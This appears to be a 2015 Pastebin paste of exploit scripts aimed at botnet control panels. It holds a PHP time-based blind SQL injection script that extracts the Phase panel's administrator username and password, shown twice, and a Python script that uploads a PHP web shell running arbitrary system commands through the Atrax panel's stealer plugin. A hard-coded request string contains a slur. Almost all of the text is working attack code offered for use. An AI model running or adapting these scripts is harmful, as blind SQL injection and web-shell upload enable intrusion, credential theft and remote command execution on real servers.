Guest User

iBanking Sh3ll - HoC Article

a guest
Jan 23rd, 2015
558
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. shell: <?php
  2. // Panel.zip hash: c49c74a609b24284a0a66fc008c4d8f2
  3. // Start with PHP CLI (php pwn.php)
  4. set_time_limit(0);
  5.  
  6. // Adjust this :)
  7. define('SLEEP_TIME', '4');
  8. define('PAGE_TIME', 4);
  9. define('URL', 'http://localhost/Phase/');
  10.  
  11. echo('attacking ' . URL . PHP_EOL);
  12.  
  13. get_string('username');
  14. get_string('password');
  15.  
  16. function get_length($field) {
  17. $length = 1;
  18.  
  19. while (!is_true("' UNION SELECT ALL 1,2,3,4,5,6,7 FROM `settings` WHERE `key` = '" . $field . "' AND (NOT (LENGTH(value)=" . $length . ") OR SLEEP(" . SLEEP_TIME . "))-- ")) {
  20. ++$length;
  21. }
  22.  
  23. echo($field . ' length: ' . $length . PHP_EOL);
  24.  
  25. return $length;
  26. }
  27.  
  28. function get_string($field) {
  29. $length = get_length($field);
  30. $str = '';
  31.  
  32. for ($i = 0; $i < $length; ++$i) {
  33. $str .= chr(get_char($field, $i));
  34. echo($field . ' : ' . str_pad($str, $length, '*') . PHP_EOL);
  35. }
  36.  
  37. return $str;
  38. }
  39.  
  40. function get_char($field, $id) {
  41. $binary = '';
  42.  
  43. for ($i = 1; $i < 256; $i *= 2) {
  44. if ($i == 128)
  45. $binary = '0' . $binary;
  46. else
  47. $binary = (is_true("' UNION SELECT ALL 1,2,3,4,5,6,7 FROM `settings` WHERE `key` = '" . $field . "' AND (NOT (ORD(SUBSTR(`value`," . ($id + 1) . ",1)) & " . $i . ") OR SLEEP(" . SLEEP_TIME . "))-- ") ? '1' : '0') . $binary;
  48. }
  49.  
  50. return bindec($binary);
  51. }
  52.  
  53. function is_true($query) {
  54. $rc4_key = 'aaaa'; // b d u
  55. $data = 'u=tapz&d=faggot&b=lol';
  56. $encode = rc4($rc4_key, $data, strlen($data), strlen($rc4_key));
  57. $encode = $rc4_key . $encode;
  58. $injection = urlencode($query);
  59. $req = post_request(URL . 'gate.php?i=127.0.0.1' . $injection, $encode);
  60.  
  61. return !($req['time'] < PAGE_TIME);
  62. }
  63.  
  64. function post_request($url, $data) {
  65. $handle = curl_init($url);
  66.  
  67. curl_setopt($handle, CURLOPT_HEADER, false);
  68. curl_setopt($handle, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36');
  69. curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);
  70. curl_setopt($handle, CURLOPT_POST, true);
  71. curl_setopt($handle, CURLOPT_POSTFIELDS, $data);
  72. curl_setopt($handle, CURLOPT_TIMEOUT, 30);
  73.  
  74. $time = microtime(true);
  75. $page = curl_exec($handle);
  76. $time = microtime(true) - $time;
  77.  
  78. curl_close($handle);
  79.  
  80. return array(
  81. 'page' => $page,
  82. 'time' => $time
  83. );
  84. }
  85.  
  86. function rc4($pwd, $data, $data_length, $pwd_length){
  87. $key[] = '';
  88. $box[] = '';
  89. $cipher = '';
  90.  
  91. for ($i = 0; $i < 256; $i++)
  92. {
  93. $key[$i] = ord($pwd[$i % $pwd_length]);
  94. $box[$i] = $i;
  95. }
  96. for ($j = $i = 0; $i < 256; $i++)
  97. {
  98. $j = ($j + $box[$i] + $key[$i]) % 256;
  99. $tmp = $box[$i];
  100. $box[$i] = $box[$j];
  101. $box[$j] = $tmp;
  102. }
  103. for ($a = $j = $i = 0; $i < $data_length; $i++)
  104. {
  105. $a = ($a + 1) % 256;
  106. $j = ($j + $box[$a]) % 256;
  107. $tmp = $box[$a];
  108. $box[$a] = $box[$j];
  109. $box[$j] = $tmp;
  110. $k = $box[(($box[$a] + $box[$j]) % 256)];
  111. $cipher .= chr(ord($data[$i]) ^ $k);
  112. }
  113. return $cipher;
  114. }
  115.  
  116. creds to: Xytilol
  117.  
  118. Atrax botnet
  119. ==============
  120.  
  121. Type: Shell Upload
  122.  
  123. Shell: #!/usr/bin/python
  124.  
  125. import random
  126. import string
  127. import base64
  128. import urllib
  129. import urllib2
  130.  
  131. # <CONFIG>
  132. payload = '<pre><?php if(isset($_GET["c"]))system($_GET["c"]);else echo("No input?");?></pre>'
  133. url = 'http://localhost/atrax/'
  134. # </CONFIG>
  135.  
  136. BOT_MODE_INSERT = 'b' # BOT MODE
  137. BOT_MODE_RUNPLUGIN = 'e'
  138. GET_PARAM_MODE = 'a' # GET PARAM
  139. POST_PARAM_GUID = 'h' # POST PARAM
  140. POST_PARAM_IP = 'i'
  141. POST_PARAM_BUILDID = 'j'
  142. POST_PARAM_PC = 'k'
  143. POST_PARAM_OS = 'l'
  144. POST_PARAM_ADMIN = 'm'
  145. POST_PARAM_CPU = 'n'
  146. POST_PARAM_GPU = 'o'
  147. POST_PARAM_PLUGINNAME = 'q'
  148.  
  149. def request(url, get, post):
  150. if not get == '':
  151. url += '?' + get
  152. encoded = {}
  153. if not post == '':
  154. for _ in post.split('&'):
  155. data = _.split('=')
  156. encoded[data[0]] = data[1]
  157. encoded = urllib.urlencode(encoded)
  158. request = urllib2.Request(url, encoded)
  159. response = urllib2.urlopen(request)
  160. page = response.read()
  161. return page
  162.  
  163. def queryValue(key, value, next=True):
  164. ret = key + '=' + value
  165. if next:
  166. ret += '&'
  167. return ret
  168.  
  169. def randomString(length = 8):
  170. return ''.join(random.choice(string.ascii_lowercase + string.digits) for i in range(length))
  171.  
  172. def createVictim(url, guid, ip):
  173. get = queryValue(GET_PARAM_MODE, BOT_MODE_INSERT, False)
  174. post = queryValue(POST_PARAM_GUID, guid)
  175. post += queryValue(POST_PARAM_IP, ip)
  176. post += queryValue(POST_PARAM_BUILDID, randomString())
  177. post += queryValue(POST_PARAM_PC, randomString())
  178. post += queryValue(POST_PARAM_OS, randomString())
  179. post += queryValue(POST_PARAM_ADMIN, 'yes')
  180. post += queryValue(POST_PARAM_CPU, randomString())
  181. post += queryValue(POST_PARAM_GPU, randomString(), False)
  182. return request(url + 'auth.php', get, post)
  183.  
  184. def exploit(url, guid, ip, file, payload):
  185. get = queryValue(GET_PARAM_MODE, BOT_MODE_RUNPLUGIN, False)
  186. post = queryValue(POST_PARAM_PLUGINNAME, 'atraxstealer')
  187. post += queryValue(POST_PARAM_GUID, guid)
  188. post += queryValue(POST_PARAM_IP, ip)
  189. post += queryValue('am', randomString())
  190. post += queryValue('ad', file)
  191. post += queryValue('ab', base64.b64encode(payload))
  192. post += queryValue('ai', '18', False)
  193. request(url + 'auth.php', get, post)
  194.  
  195. def testExploit(url, guid, ip):
  196. file = randomString() + '.php'
  197. payload = '<?php echo("1337"); ?>'
  198. exploit(url, guid, ip, file, payload)
  199. return request(url + 'plugins/atraxstealer/wallet/' + file, '', '').strip() == '1337'
  200.  
  201. guid = '7461707a7461707a7461707a7461707a'
  202. ip = '91.224.13.103'
  203. file = randomString() + '.php'
  204. if createVictim(url, guid, ip).strip() == 'STOP':
  205. print '[-] Cannot create victim...'
  206. else:
  207. print '[~] Victim created/updated...'
  208. if testExploit(url, guid, ip):
  209. exploit(url, guid, ip, file, payload)
  210. print '[+] Exploit uploaded!'
  211. print '=> ' + url + 'plugins/atraxstealer/wallet/' + file
  212. else:
  213. print '[-] Cannot upload payload, maybe the plugin is not actived?'
  214.  
  215.  
  216. Phase botnet
  217. ===============
  218.  
  219. Type: blind SQLi
  220.  
  221. Vuln: <?php
  222. // Panel.zip hash: c49c74a609b24284a0a66fc008c4d8f2
  223. // Start with PHP CLI (php pwn.php)
  224. set_time_limit(0);
  225.  
  226. // Adjust this :)
  227. define('SLEEP_TIME', '4');
  228. define('PAGE_TIME', 4);
  229. define('URL', 'http://localhost/Phase/');
  230.  
  231. echo('attacking ' . URL . PHP_EOL);
  232.  
  233. get_string('username');
  234. get_string('password');
  235.  
  236. function get_length($field) {
  237. $length = 1;
  238.  
  239. while (!is_true("' UNION SELECT ALL 1,2,3,4,5,6,7 FROM `settings` WHERE `key` = '" . $field . "' AND (NOT (LENGTH(value)=" . $length . ") OR SLEEP(" . SLEEP_TIME . "))-- ")) {
  240. ++$length;
  241. }
  242.  
  243. echo($field . ' length: ' . $length . PHP_EOL);
  244.  
  245. return $length;
  246. }
  247.  
  248. function get_string($field) {
  249. $length = get_length($field);
  250. $str = '';
  251.  
  252. for ($i = 0; $i < $length; ++$i) {
  253. $str .= chr(get_char($field, $i));
  254. echo($field . ' : ' . str_pad($str, $length, '*') . PHP_EOL);
  255. }
  256.  
  257. return $str;
  258. }
  259.  
  260. function get_char($field, $id) {
  261. $binary = '';
  262.  
  263. for ($i = 1; $i < 256; $i *= 2) {
  264. if ($i == 128)
  265. $binary = '0' . $binary;
  266. else
  267. $binary = (is_true("' UNION SELECT ALL 1,2,3,4,5,6,7 FROM `settings` WHERE `key` = '" . $field . "' AND (NOT (ORD(SUBSTR(`value`," . ($id + 1) . ",1)) & " . $i . ") OR SLEEP(" . SLEEP_TIME . "))-- ") ? '1' : '0') . $binary;
  268. }
  269.  
  270. return bindec($binary);
  271. }
  272.  
  273. function is_true($query) {
  274. $rc4_key = 'aaaa'; // b d u
  275. $data = 'u=tapz&d=faggot&b=lol';
  276. $encode = rc4($rc4_key, $data, strlen($data), strlen($rc4_key));
  277. $encode = $rc4_key . $encode;
  278. $injection = urlencode($query);
  279. $req = post_request(URL . 'gate.php?i=127.0.0.1' . $injection, $encode);
  280.  
  281. return !($req['time'] < PAGE_TIME);
  282. }
  283.  
  284. function post_request($url, $data) {
  285. $handle = curl_init($url);
  286.  
  287. curl_setopt($handle, CURLOPT_HEADER, false);
  288. curl_setopt($handle, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36');
  289. curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);
  290. curl_setopt($handle, CURLOPT_POST, true);
  291. curl_setopt($handle, CURLOPT_POSTFIELDS, $data);
  292. curl_setopt($handle, CURLOPT_TIMEOUT, 30);
  293.  
  294. $time = microtime(true);
  295. $page = curl_exec($handle);
  296. $time = microtime(true) - $time;
  297.  
  298. curl_close($handle);
  299.  
  300. return array(
  301. 'page' => $page,
  302. 'time' => $time
  303. );
  304. }
  305.  
  306. function rc4($pwd, $data, $data_length, $pwd_length){
  307. $key[] = '';
  308. $box[] = '';
  309. $cipher = '';
  310.  
  311. for ($i = 0; $i < 256; $i++)
  312. {
  313. $key[$i] = ord($pwd[$i % $pwd_length]);
  314. $box[$i] = $i;
  315. }
  316. for ($j = $i = 0; $i < 256; $i++)
  317. {
  318. $j = ($j + $box[$i] + $key[$i]) % 256;
  319. $tmp = $box[$i];
  320. $box[$i] = $box[$j];
  321. $box[$j] = $tmp;
  322. }
  323. for ($a = $j = $i = 0; $i < $data_length; $i++)
  324. {
  325. $a = ($a + 1) % 256;
  326. $j = ($j + $box[$a]) % 256;
  327. $tmp = $box[$a];
  328. $box[$a] = $box[$j];
  329. $box[$j] = $tmp;
  330. $k = $box[(($box[$a] + $box[$j]) % 256)];
  331. $cipher .= chr(ord($data[$i]) ^ $k);
  332. }
  333. return $cipher;
  334. }
RAW Paste Data